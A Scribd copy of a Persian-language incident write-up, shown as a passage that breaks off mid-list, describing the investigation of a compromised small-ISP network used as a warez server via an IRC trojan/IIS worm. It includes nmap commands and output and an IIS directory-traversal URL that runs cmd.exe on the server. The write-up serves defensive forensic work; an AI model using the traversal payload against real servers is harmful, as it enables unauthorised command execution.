Scribd
Upload
86 views6 pages

IRC Trojan/IIS Worm - Mini Internet Service Provider (ISP)

This document discusses a client's computer network that had been compromised by hackers in several ways: 1. The client's T1 internet connection had slowed down unexpectedly and they were worried their system may be infected with a virus or worm, as they had experienced this issue before. 2. Upon investigating, the client's network was found to be infected not just with digital worms, but was being used as a warez server by various hackers, including through a new type of IRC-worm called Total Kill. 3. As the client ran a small mini internet service provider business, allowing friends and family occasional internet access, many untrustworthy people had access to configure the network, leaving it vulnerable to compromise

Uploaded by

api-3777069
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
86 views6 pages

IRC Trojan/IIS Worm - Mini Internet Service Provider (ISP)

This document discusses a client's computer network that had been compromised by hackers in several ways: 1. The client's T1 internet connection had slowed down unexpectedly and they were worried their system may be infected with a virus or worm, as they had experienced this issue before. 2. Upon investigating, the client's network was found to be infected not just with digital worms, but was being used as a warez server by various hackers, including through a new type of IRC-worm called Total Kill. 3. As the client ran a small mini internet service provider business, allowing friends and family occasional internet access, many untrustworthy people had access to configure the network, leaving it vulnerable to compromise

Uploaded by

api-3777069
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 6

‫ﺭﻭﻳﺎﺭﻭﻱ ﺍﻧﻮﺍﻉ ﻫﻜﺮ‬

‫ﺭﻭﻳﺎﺭﻭﻱ ﺍﻧﻮﺍﻉ ﻫﻜﺮ‬


‫ﺗﻬﻴﻪ ﻛﻨﻨﺪﻩ‪ :‬ﺍﻣﻴﺮﺣﺴﻴﻦ ﺷﺮﻳﻔﻲ‬

‫ﻣﺎﺟﺮﺍ ﺍﺯ ﺁﻧﺠﺎﻳﻲ ﺷﺮﻭﻉ ﺷﺪ ﻛﻪ ﻳﻜﻲ ﺍﺯ ﺍﻗﻮﺍﻡ ﻭ ﻣﺸﺘﺮﻳﻬﺎﻱ ﻧﺰﺩﻳﻚ ﻣﻦ ﺑﺎ ﻣﺸﻜﻞ ﺍﻳﻨﺘﺮﻧﺖ‬


‫ﻣﻮﺍﺟﻪ ﺷﺪﻩ ﺑﻮﺩ‪ .‬ﺑﻪ ﺧﺼﻮﺹ ﺍﻳﻨﻜﻪ ﺍﻭ ﺗﻌﺠﺐ ﻛﺮﺩﻩ ﺑﻮﺩ ﻛﻪ ﭼﺮﺍ ﺧﻂ ‪ T1‬ﺍﻭ ﺑﻪ ﺻﻮﺭﺕ‬
‫ﻧﺎﻣﺸﺨﺼﻲ ﻛﹸﻨﺪ ﺷﺪﻩ ﺑﻮﺩ ﻭ ﻧﮕﺮﺍﻥ ﺑﻮﺩ ﺍﺯ ﺍﻳﻨﻜﻪ ﺷﺎﻳﺪ ﺳﻴﺴﺘﻢ ﺍﻭ ﮔﺮﻓﺘﺎﺭ ﻭﻳﺮﻭﺱ ﻳﺎ ﻛﺮﻡ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﺷﺪﻩ ﺍﺳﺖ ﻣﺨﺼﻮﺻﺎ ﺍﻳﻨﻜﻪ ﺍﻭ ﺩﺭ ﮔﺬﺷﺘﻪ ﻳﻚ ﺑﺎﺭ ﺩﭼﺎﺭ ﺍﻳﻦ ﻣﺸﻜﻞ ﺷﺪﻩ ﺑﻮﺩ‪ .‬ﻣﻦ‬
‫ﺑﻪ ﺍﻭ ﮔﻔﺘﻢ ﻛﻪ ﻳﻚ ﻧﮕﺎﻫﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﻭ ﺧﻮﺍﻫﻢ ﻛﺮﺩ‪.‬‬
‫ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻣﺸﻜﻞ ﻗﺒﻠﻲ ﻛﻪ ﺩﺍﺷﺖ ﻣﻦ ﺍﻧﺘﻈﺎﺭ ﺩﺍﺷﺘﻢ ﻛﻪ ﺍﺣﺘﻤﺎﻻ ﺳﻴﺴﺘﻢ ﺍﻭ ﺩﻭﺑﺎﺭﻩ ﺩﭼﺎﺭ‬
‫ﻭﻳﺮﻭﺱ ﻳﺎ ﻛﺮﻡ ﺷﺪﻩ ﺍﺳﺖ ﻭ ﺑﺎ ﻛﻤﻲ ﺭﺍﻫﻨﻤﺎﻳﻲ ﻭ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺳﺎﺩﻩ ﻣﻲ ﺗﻮﺍﻧﺪ ﺁﻥ ﺭﺍ ﺍﺯ‬
‫ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺣﺬﻑ ﻛﻨﺪ‪ .‬ﺍﻣﺎ ﺑﺮ ﺧﻼﻑ ﺗﺼﻮﺭ ﻣﻦ ﺍﻳﻦ ﭘﻴﺶ ﺩﺍﻭﺭﻱ ﻣﺎﻧﻨﺪ ﻳﻚ ﻛﺎﻫﻲ ﺑﻮﺩ ﺗﻮﻱ‬
‫ﻳﻚ ﻛﻮﻩ ﺍﺯ ﻣﺸﻜﻼﺗﻲ ﻛﻪ ﺍﻭ ﺑﺎ ﺁﻧﻬﺎ ﻣﻮﺍﺟﻬﻪ ﺑﻮﺩ‪ .‬ﺷﺒﻜﻪ ﻣﺸﺘﺮﻱ ﻣﻦ ﻓﻘﻂ ﺑﺎ ﻛﺮﻣﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ‬
‫ﺁﻟﻮﺩﻩ ﻧﺸﺪﻩ ﺑﻮﺩ ‪ ،‬ﺑﻠﻜﻪ ﺑﻪ ﻋﻨﻮﺍﻥ ﻳﻚ ﺳﺮﻭﺭ ‪ Warez‬ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺑﺮﺍﻱ ﺍﻧﻮﺍﻉ ﻫﻜﺮﻫﺎ ﺷﺪﻩ‬
‫ﺑﻮﺩ ﺑﻪ ﺧﺼﻮﺹ ﺑﻪ ﻭﺳﻴﻠﻪ ﻳﻚ ﮔﻮﻧﻪ ﺟﺪﻳﺪ ﺍﺯ ﺗﺮﻭﺟﺎﻥ ‪ - IRC‬ﻛﺮﻡ ‪ ١IIS‬ﻛﻪ ‪Total Kill‬‬
‫ﻧﺎﻡ ﺩﺍﺷﺖ‪.‬‬

‫ﻣﺸﺘﺮﻱ‬
‫ﺍﻳﻦ ﻣﺸﺘﺮﻱ ﻣﻦ ﻳﻜﻲ ﺍﺯ ﺁﻥ ﺩﺳﺘﻪ ﻣﺸﺘﺮﻱ ﻫﺎﻳﻲ ﺑﻮﺩ ﻛﻪ ﺩﺍﺭﺍﻱ ﺣﺮﻓﻪ ﻫﺎﻱ ﻛﻮﭼﻜﻲ ﻫﺴﺘﻨﺪ ﻭ‬
‫ﻧﻴﺎﺯﻱ ﺑﻪ ﻳﻚ ﺧﻂ ﺍﺟﺎﺭﻩ ﺍﻱ ﺑﻪ ﺻﻮﺭﺕ ﻛﺎﻣﻞ ﻧﺪﺍﺭﻧﺪ‪ .‬ﺩﺭ ﻋﻮﺽ ﺁﻧﻬﺎ ﺑﻪ ﻭﺳﻴﻠﻪ ﺍﻳﻦ ﺧﻂ ﺑﻪ‬
‫ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺩﻭﺳﺘﺎﻥ ﻭ ﺍﻗﻮﺍﻣﺸﺎﻥ ﺑﻪ ﺻﻮﺭﺕ ﭘﺎﺭﻩ ﻭﻗﺖ ﻫﻢ ﺳﺮﻭﻳﺲ ﺍﻳﻨﺘﺮﻧﺖ ﻣﻲ ﺩﻫﻨﺪ‪ .‬ﺩﺭ‬
‫ﻧﺘﻴﺠﻪ ﺷﺒﻜﻪ ﺍﻭ ﺍﺯ ﻣﻴﺎﻥ ﺩﺳﺘﺎﻥ ﺧﻴﻠﻲ ﺍﺯ ﺍﺷﺨﺎﺹ ﺩﺍﺭﺍﻱ ﺳﺮ ﺭﺷﺘﻪ ﮔﺬﺷﺘﻪ ﺑﻮﺩ ﻭ ﺩﺭ ﺗﻤﺎﻡ‬
‫ﻃﻮﻝ ﺍﻳﻦ ﺩﻭ ﺳﺎﻝ ﺑﻪ ﻭﺳﻴﻠﻪ ﭘﺮﺳﻨﻞ ﺍﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺷﺪﻩ ﺑﻮﺩ ﻭ ﻫﺮ ﻛﺴﻲ ﺍﺯ ﺁﻧﻬﺎ ﻫﺮ ﻭﻗﺖ ﻛﻪ‬
‫ﻣﻲ ﺧﻮﺍﺳﺖ ﻣﻲ ﺗﻮﺍﻧﺴﺖ ﺑﻪ ﻃﺮﺣﺒﻨﺪﻱ ﻭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺒﻜﻪ ﺍﻭ ﺍﺿﺎﻓﻪ ﻳﺎ ﻛﻢ ﻛﻨﺪ ﻭ ﺑﺮﺍﻱ ﻫﻤﻴﻦ‬
‫ﺷﺒﻜﻪ ﺩﻭﺳﺖ ﻋﺰﻳﺰ ﻣﻦ ﺑﻪ ﺻﻮﺭﺕ ﻳﻚ ﺗﻮﻟﻴﺪ ﻛﻨﻨﺪﻩ ﺳﺮﻭﻳﺲ ﺍﻳﻨﺘﺮﻧﺖ ﻛﻮﭼﻚ‪ ٢‬ﺷﺪﻩ ﺑﻮﺩ‪.‬‬

‫‪1‬‬
‫‪-IRC Trojan/IIS worm‬‬
‫‪2‬‬
‫)‪- Mini Internet Service Provider (ISP‬‬

‫‪1‬‬ ‫‪www.websecuritymgz.com‬‬
‫ﺭﻭﻳﺎﺭﻭﻱ ﺍﻧﻮﺍﻉ ﻫﻜﺮ‬

‫ﺍﻭ ﺑﺮﺍﻱ ﺣﺮﻓﻪ ‪ ISP‬ﺍﺵ ﻳﻚ ﺧﻂ ‪T1‬‬


‫ﻟﻴﺴﺖ ﺷﻤﺎﺭﻩ ‪ – ١‬ﻧﺘﻴﺠﻪ ﺑﺮﻧﺎﻣﻪ ‪ nmap‬ﺭﻭﻱ ﺳﺮﻭﺭ ﺍﺻﻠﻲ‬
‫ﻭ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺁﺩﺭﺱ ‪ IP‬ﺧﺮﻳﺪﺍﺭﻱ‬
‫ﻣﺸﺘﺮﻱ‬
‫‪Starting‬‬ ‫‪nmap‬‬ ‫‪V‬‬ ‫‪2.54BETA22‬‬ ‫ﻛﺮﺩﻩ ﺑﻮﺩ ﻭ ﻫﻤﭽﻨﻴﻦ ﺗﺠﻬﻴﺰﺍﺗﺶ ﺭﺍ ‪،‬‬
‫)‪(www.insecure.org/nmap‬‬ ‫ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺁﻥ ﺭﺍ ﻣﺪﻳﺮﻳﺖ ﻛﻨﺪ‪ .‬ﺩﺭ‬
‫;)‪Interesting ports on (192.168.0.66‬‬
‫‪(The ports scanned but not shown below are in‬‬ ‫ﻧﺘﻴﺠﻪ ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺍﻳﻦ ﺁﺩﺭﺱ ﻫﺎﻱ ‪IP‬‬
‫)‪state : close‬‬
‫‪port‬‬ ‫‪State‬‬ ‫‪Service‬‬ ‫ﻫﺪﺭ ﺩﺍﺩﻩ ﻧﺸﻮﻧﺪ ﻳﻜﻲ ﺍﺯ ﻣﺪﻳﺮﺍﻥ ﻗﺒﻠﻲ‬
‫‪53/tcp‬‬ ‫‪open‬‬ ‫‪domain‬‬
‫ﺍﺵ ﻳﻚ ﻣﺴﻴﺮ ﻳﺎﺏ ﺳﻴﺴﻜﻮ ﻭ ﻳﻚ‬
‫‪80/tcp‬‬ ‫‪open‬‬ ‫‪http‬‬
‫‪135/tcp‬‬ ‫‪open‬‬ ‫‪loe-srv‬‬ ‫ﺳﺮﻭﺭ ‪ DHCP‬ﺭﺍ ﺭﺍﻩ ﺍﻧﺪﺍﺯﻱ ﻛﺮﺩﻩ‬
‫‪137/tcp‬‬ ‫‪filtered‬‬ ‫‪netbios-ns‬‬
‫‪138/tcp‬‬ ‫‪filtered‬‬ ‫‪netbios-dgm‬‬ ‫ﺑﻮﺩ ﻭ ﺑﺮﺍﻱ ﻫﺮ ﻛﺎﻣﭙﻴﻮﺗﺮ ﺩﺍﺧﻠﻲ ﻳﻚ‬
‫‪139/tcp‬‬ ‫‪filtered‬‬ ‫‪netbios-ssn‬‬
‫‪593/tcp‬‬ ‫‪open‬‬ ‫‪http-rpe-epmap‬‬
‫ﺁﺩﺭﺱ ‪ IP‬ﻣﺠﺰﺍ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺑﻮﺩ‬
‫‪1029/tcp‬‬ ‫‪open‬‬ ‫‪unknown‬‬ ‫ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺱ‬
‫‪1031/tcp‬‬ ‫‪open‬‬ ‫‪iad2‬‬
‫‪1035 tcp‬‬ ‫‪open‬‬ ‫‪unknown‬‬ ‫ﺑﻮﺩ‪.‬‬
‫‪1038/tcp‬‬ ‫‪open‬‬ ‫‪unknown‬‬
‫‪1042 tcp‬‬ ‫‪open‬‬ ‫‪unknown‬‬
‫ﺩﺭ ﻫﺴﺘﻪ ﺍﻳﻦ ﺷﺒﻜﻪ ﻳﻚ ﻛﺎﻣﭙﻴﻮﺗﺮ ﺑﻮﺩ‬
‫‪1490 tcp‬‬ ‫‪open‬‬ ‫‪unknown‬‬ ‫ﻛﻪ ﻣﻴﺰﺑﺎﻥ ﮔﺮﻭﻩ ﺯﻳﺎﺩﻱ ﺍﺯ ﺳﺮﻭﻳﺲ‬
‫ﻫﺎ ﺑﻮﺩ‪.‬ﺩﺭ ﻛﺎﻣﭙﻴﻮﺗﺮ ﻳﻚ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ‬
‫‪ ، DNS‬ﺳﺮﻭﺭ ‪ ، DHCP‬ﺳﺮﻭﺭ‬ ‫‪ NT4‬ﺍﺟﺮﺍ ﺷﺪﻩ ﺑﻮﺩ ﻛﻪ ﺑﻪ ﻋﻨﻮﺍﻥ ﻳﻚ ﺳﺮﻭﺭ‬
‫ﻭ ﺳﺮﻭﺭ ﻓﺎﻳﻞ ﻋﻤﻞ ﻣﻲ ﻛﺮﺩ ‪ .‬ﺍﻳﻦ ﺳﺮﻭﺭ‬ ‫‪٣‬‬
‫‪ ، Exchange‬ﻛﻨﺘﺮﻝ ﻛﻨﻨﺪﻩ ﺍﺑﺘﺪﺍﻳﻲ ﺩﺍﻣﻨﻪ ﻫﺎ‬
‫ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﻋﻨﻮﺍﻥ ﻳﻚ ﻣﻴﺰﺑﺎﻥ ﺑﺮﺍﻱ ﺑﺮﻧﺎﻣﻪ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺷﺮﻛﺘﺶ ﻋﻤﻞ ﻣﻲ ﻛﺮﺩ‪ .‬ﺑﻪ ﺧﺎﻃﺮ‬
‫ﺳﺮﻭﻳﺴﻬﺎﻱ ﺯﻳﺎﺩﻱ ﻛﻪ ﺍﻳﻦ ﻛﺎﻣﭙﻴﻮﺗﺮ ﺍﺭﺍﺋﻪ ﻣﻲ ﺩﺍﺩ ﻣﻲ ﺗﻮﺍﻧﺴﺖ ﻫﺪﻑ ﺍﺑﺘﺪﺍﻳﻲ ﺑﺮﺍﻱ ﻭﻳﺮﻭﺱ‬
‫ﻫﺎ ﻭ ﻛﺮﻣﻬﺎ ﺑﺎﺷﺪ‪ .‬ﺩﺭ ﺣﻘﻴﻘﺖ ‪ ٥‬ﻣﺎﻩ ﻗﺒﻞ ﺍﺯ ﺍﻳﻦ ﻭﺿﻌﻴﺖ ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ ﺑﻪ ﻭﺳﻴﻠﻪ‬
‫‪ Nimda‬ﻣﻮﺭﺩ ﻫﺠﻮﻡ ﻭﺍﻗﻊ ﺷﺪﻩ ﺑﻮﺩ‪.‬‬

‫ﺗﺤﻘﻴﻘﺎﺕ ﺍﻭﻟﻴﻪ ‪ ،‬ﺭﻭﺯ ﺍﻭﻝ – ﺑﻌﺪ ﺍﺯ ﻇﻬﺮ‬


‫ﺍﻭﻟﻴﻦ ﭼﻴﺰﻱ ﻛﻪ ﻣﻦ ﺑﺎﻳﺪ ﺍﻧﺠﺎﻡ ﻣﻲ ﺩﺍﺩﻡ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﻭﺿﻌﻴﺖ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺪﺍﻧﻢ‪ .‬ﺑﺎ ﺑﻴﺎﻥ ﺩﻳﮕﺮ‬
‫ﻣﻦ ﺩﻧﺒﺎﻝ ﭘﻮﺭﺗﻬﺎﻱ ﺑﺎﺯ ﺳﻴﺴﺘﻢ ﻣﻲ ﮔﺸﺘﻢ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺣﻀﻮﺭ ﻳﻚ ﺳﺮﻭﻳﺲ ﺍﺿﺎﻓﻪ ﻭ ﻳﺎ‬
‫ﺗﺮﻭﺟﺎﻥ ﺭﺍ ﻧﺸﺎﻥ ﺩﻫﺪ‪ .‬ﺑﻬﺘﺮﻳﻦ ﻭﺳﻴﻠﻪ ﺑﺮﺍﻱ ﺍﻳﻦ ﻛﺎ ﺑﺮﻧﺎﻣﻪ ‪ Nmap‬ﻣﻲ ﺑﺎﺷﺪ ﻛﻪ ﻣﻦ ﻳﻜﻲ ﺍﺯ‬
‫ﺁﻧﻬﺎ ﺭﺍ ﻧﺼﺐ ﻛﺮﺩﻡ ﻭ ﺗﻤﺎﻡ ﭘﻮﺭﺗﻬﺎ ﺭﺍ ﺍﺯ ‪ 1‬ﺗﺎ ‪ 65535‬ﺑﺮﺍﻱ ﺁﺩﺭﺱ ﻫﺎﻱ ‪ IP‬ﻣﻮﺟﻮﺩ ﺩﺭ‬
‫ﺷﺒﻜﻪ ﺑﺮﺭﺳﻲ ﻛﺮﺩﻡ‪ .‬ﺩﺳﺘﻮﺭﻱ ﻛﻪ ﻣﻦ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻡ ﺑﻪ ﺷﻜﻞ ﺯﻳﺮ ﺑﻮﺩ‪:‬‬

‫‪3‬‬
‫‪- Primary domain controller‬‬

‫‪2‬‬ ‫‪www.websecuritymgz.com‬‬
‫ﺭﻭﻳﺎﺭﻭﻱ ﺍﻧﻮﺍﻉ ﻫﻜﺮ‬

‫‪Nmap –sS –p 1-65535 –O 192.168.x.x‬‬

‫ﺑﻪ ﻣﺤﺾ ﺍﻳﻨﻜﻪ ‪ Nmap‬ﻛﺎﻭﺵ ﺧﻮﺩﺵ ﺭﺍ ﺗﻤﺎﻡ ﻛﺮﺩ ﻣﻦ ﺑﻪ ﺳﺮﻋﺖ ﺧﺮﻭﺟﻲ ﺭﺍ ﻣﺮﻭﺭ ﻛﺮﺩﻡ‬
‫ﻭ ﺩﻧﺒﺎﻝ ﻫﺮ ﭼﻴﺰ ﻣﺸﻜﻮﻙ ﻭ ﻳﺎ ﭘﻮﺭﺗﻬﺎﻱ ﻣﺸﻬﻮﺭ ﺑﻪ ﻋﻨﻮﺍﻥ ﻣﺜﺎﻝ ‪23 ، 21 ، 12345 ، 31337‬‬
‫ﻭ ﻳﺎ ﻫﺮ ﭼﻴﺰ ﺩﻳﮕﺮﻱ ﻛﻪ ﻧﺸﺎﻥ ﺩﻫﺪﻩ ﻳﻚ ﺳﺮﻭﻳﺲ ﺍﺿﺎﻓﻲ ﻭ ﻳﺎ ﭘﻮﺭﺗﻲ ﺍﺯ ﻳﻚ ﺗﺮﻭﺟﺎﻥ‬
‫ﻣﺸﻬﻮﺭ ﺑﺎﺷﺪ ‪ ،‬ﻣﻲ ﮔﺸﺘﻢ ! ﺣﺎﻝ ﺁﻧﻜﻪ ﺗﻤﺎﻡ ﻛﺎﻣﭙﻴﻮﺗﺮ ﻫﺎ ﺟﻮﺍﺏ ﻣﺜﺒﺘﻲ ﺭﻭﻱ ﭘﻮﺭﺗﻬﺎﻱ ﺍﺯ‬
‫‪ 135‬ﺗﺎ ‪ 139‬ﺩﺍﺷﺘﻨﺪ ﻛﻪ ﻧﺸﺎﻥ ﺩﻫﻨﺪﻩ ‪ NetBIOS‬ﻭ ﺑﺨﺸﻬﺎﻱ ﻣﻤﻜﻦ ﺁﻥ ﺑﻮﺩ‪.‬ﻫﻤﭽﻨﻴﻦ ﭘﻮﺭﺕ‬
‫‪ 80‬ﺳﺮﻭﺭ ﺍﺻﻠﻲ ﻣﺸﺘﺮﻱ ﺑﺎﺯ ﺑﻮﺩ‪).‬ﻟﻴﺴﺖ ‪ ١‬ﺭﺍ ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ (‬

‫ﺑﻌﺪ ﺍﺯ ﻣﺘﻮﺟﻪ ﺷﺪﻡ ﭘﻮﺭﺕ ‪ ٨٠‬ﺑﺎﺯ ﺍﺳﺖ ‪ ،‬ﺳﺮﻳﻌﺎ ﻣﺮﻭﺭﮔﺮ ﺧﻮﺩﻡ ﺭﺍ ﺑﺎﺯ ﻛﺮﺩﻡ ﺗﺎ ﺑﺒﻴﻨﻢ ﭼﻪ‬
‫ﺻﻔﺤﺎﺕ ﻭﺑﻲ ﺭﻭﻱ ﺍﻳﻦ ﺳﺮﻭﺭ ﮔﺬﺍﺷﺘﻪ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﭘﻮﺭﺕ ‪ 80‬ﻣﻌﻤﻮﻻ ﺑﺮﺍﻱ ﺳﺮﻭﺭ ﻭﺏ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﺷﻮﺩ ﻭ ﺻﻔﺤﺎﺗﻲ ﻛﻪ ﺩﺭ ﻫﻨﮕﺎﻡ ﻧﺼﺐ ‪ IIS‬ﺑﻪ ﺻﻮﺭﺕ ﻣﻌﻤﻮﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺭﺍ‬
‫ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩﻡ‪.‬‬
‫ﻗﺪﻡ ﺑﻌﺪﻱ ﺍﻳﻦ ﺑﻮﺩ ﻛﻪ ﺳﺮﻭﺭ ﺭﺍ ﺟﺴﺘﺠﻮ ﻛﻨﻢ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﺿﻌﻔﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‬
‫ﺑﻨﺎﺑﺮﺍﻳﻦ ﭘﻮﻳﻨﺪﻩ‪ ٤‬ﻫﺎﻱ ﻣﺤﺒﻮﺏ ﺧﻮﺩ ﺭﺍ ﺍﺟﺮﺍ ﻛﺮﺩﻡ ﻭ ﺧﻮﺩ ﺑﺮﺍﻱ ﺧﻮﺭﺩﻥ ﻳﻚ ﻧﻮﺷﻴﺪﻧﻲ ﺑﻪ‬
‫ﻃﺒﻘﻪ ﭘﺎﻳﻴﻦ ﺭﻓﺘﻢ‪.‬‬
‫ﻭﻗﺘﻲ ﺑﺮﮔﺸﺘﻢ ﻧﺘﺎﻳﺞ ﻧﺎﺭﺍﺣﺖ ﻛﻨﻨﺪﻩ ﺑﻮﺩ ! ﻣﻦ ﺗﻌﺪﺍﺩ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺿﻌﻔﻬﺎﻱ ﻭ ﺳﻮﺭﺍﺧﻬﺎﻱ‬
‫ﺍﻣﻨﻴﺘﻲ ﻭ ﭘﻮﻧﻴﻜﺪﻫﺎﻱ ﺁﻟﻮﺩﻩ ! ﺭﺍ ﭘﻴﺪﺍ ﻛﺮﺩﻡ ‪ .‬ﺑﺎ ﺯﺑﺎﻥ ﺩﻳﮕﺮ ﻛﻮﭼﻜﺘﺮﻳﻦ ﺿﻌﻒ ﺩﺭ ﺳﺮﻭﺭ ﻣﻲ‬
‫ﺗﻮﺍﻧﺪ ﺑﻪ ﻳﻚ ﻧﻔﻮﺫﮔﺮ ﻭ ﻳﺎ ﻳﻚ ﻛﺮﻡ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺮﺍﻱ ﺭﺳﻮﺥ ﺑﻪ ﺳﺮﻭﺭ ﻛﻤﻚ ﻛﻨﺪ ﺁﻥ ﻭﻗﺖ‬
‫ﺿﻌﻔﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﻳﻮﻧﻴﻜﺪﻫﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﺯ ﻗﺪﻳﻤﻲ ﺗﺮﻳﻦ ﺍﻳﻦ ﺳﻮﺭﺍﺧﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻲ‬
‫ﺑﺎﺷﺪ! ﻭ ﺍﻳﻦ ﻧﺸﺎﻥ ﻣﻲ ﺩﺍﺩ ﻛﻪ ﻣﺴﻮﻭﻟﻴﻦ ﺷﺒﻜﻪ ﺑﻪ ﻫﻴﭻ ﻋﻨﻮﺍﻥ ﻫﻴﭻ ﻳﻚ ﺍﺯ ‪ Patch‬ﻫﺎ ﺭﺍ ﺑﺮﺍﻱ‬
‫ﺭﻓﻊ ﺍﻳﻨﮕﻮﻧﻪ ﺿﻌﻒ ﻫﺎ ﺑﻪ ﻛﺎﺭ ﻧﺒﺮﺩﻩ ﺍﻧﺪ‪.‬‬

‫ﺗﺴﺖ ﺿﻌﻔﻬﺎﻱ ﺳﺮﻭﺭ ‪ ،‬ﺷﺐ ﺍﻭﻝ‬


‫ﻳﻚ ﻧﻜﺘﻪ ﺧﻮﺏ ﺍﻳﻨﺠﺎ ﺑﻮﺩ ﻛﻪ ﻣﻦ ﻣﻲ ﺩﺍﻧﺴﺘﻢ ﺑﺎﻳﺪ ﺟﺴﺘﺠﻮﻫﺎﻳﻢ ﺭﺍ ﺍﺯ ﻛﺠﺎ ﺷﺮﻭﻉ ﻛﻨﻢ‪ .‬ﺑﺎ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ URL‬ﺯﻳﺮ ﻛﺎﺭﻡ ﺭﺍ ﺷﺮﻭﻉ ﻛﺮﺩﻡ‪ .‬ﻣﻦ ﺑﻪ ﻭﺳﻴﻠﻪ ﺍﻳﻦ ‪ URL‬ﺑﻪ ﺳﺮﻭﺭ ﺩﺳﺘﻮﺭ‬
‫ﺩﺍﺩﻡ ﻛﻪ ﻟﻴﺴﺖ ﺩﺍﻳﺮﻛﺘﺮﻭﻱ ‪ c:\winnt\system32‬ﺭﺍ ﻧﻤﺎﻳﺶ ﺩﻫﺪ‪:‬‬

‫‪4‬‬
‫‪- Wishker – Stealth – CGI4‬‬

‫‪3‬‬ ‫‪www.websecuritymgz.com‬‬
‫ﺭﻭﻳﺎﺭﻭﻱ ﺍﻧﻮﺍﻉ ﻫﻜﺮ‬

‫]‪http://192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/[ccc‬‬
‫‪cmd.exe?c+dir+c:\winnt\system32‬‬

‫ﻳﻚ ﻣﺮﺗﺒﻪ ﺳﺮﻭﺭ ﻧﺘﻴﺠﻪ ﺭﺍ ﺑﺮﮔﺮﺩﺍﻧﺪ‪.‬‬


‫ﻣﻦ ﺑﺎ ﻳﻚ ﻧﻈﺮ ﺳﺮﻳﻌﻲ ﻛﻪ ﺑﻪ ﻟﻴﺴﺖ ﺍﻧﺪﺍﺧﺘﻢ ﺗﻌﺪﺍﺩﻱ ﻓﺎﻳﻠﻬﺎﻱ ﻣﺸﻜﻮﻙ ﻧﻈﺮﻡ ﺭﺍ ﺟﻠﺐ ﻛﺮﺩ‪.‬‬
‫ﻣﻦ ﺗﻌﺪﺍﺩ ﺍﺯ ﺍﻳﻦ ﻓﺎﻳﻞ ﺭﺍ ﺑﺮﺍﻱ ﺷﻤﺎ ﺍﻳﻨﺠﺎ ﺑﺎﺯﮔﻮ ﻣﻲ ﻛﻨﻢ ﻭ ﻣﻲ ﮔﻮﻳﻢ ﻛﻪ ﭼﺮﺍ ﺁﻧﻬﺎ ﻣﺸﻜﻮﻙ‬
‫ﺑﻮﺩﻧﺪ‪ .‬ﻣﺘﺎﺳﻔﺎﻧﻪ ﺧﻴﻠﻲ ﺍﺯ ﻣﺪﻳﺮﺍﻥ ﺷﺒﻜﻪ ﺑﻪ ﺍﻳﻦ ﮔﻮﻧﻪ ﻓﺎﻳﻠﻬﺎﻱ ﻣﺸﻜﻮﻙ ﻫﻴﭻ ﺗﻮﺟﻪ ﺍﻱ ﻧﺪﺍﺭﻧﺪ!‬
‫• ‪ : PipeCmd.exe‬ﺍﺑﺰﺍﺭﻱ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻛﻪ ﺩﺭ ﺳﻤﺖ ﻣﺸﺘﺮﻱ ﺍﺟﺮﺍ ﻣﻲ ﺷﻮﺩ‬
‫ﻭ ﺑﻪ ﻭﺳﻴﻠﻪ ﻧﻔﻮﺫﮔﺮﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﺷﻮﺩ‪.‬‬
‫• ‪ : Omnithread_tr.dll‬ﻳﻜﻲ ﺍﺯ ﺳﻪ ﻓﺎﻳﻞ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺑﺮﺍﻱ ﻧﺼﺐ ‪ ، VNC‬ﻳﻚ ﺍﺑﺰﺍﺭ‬
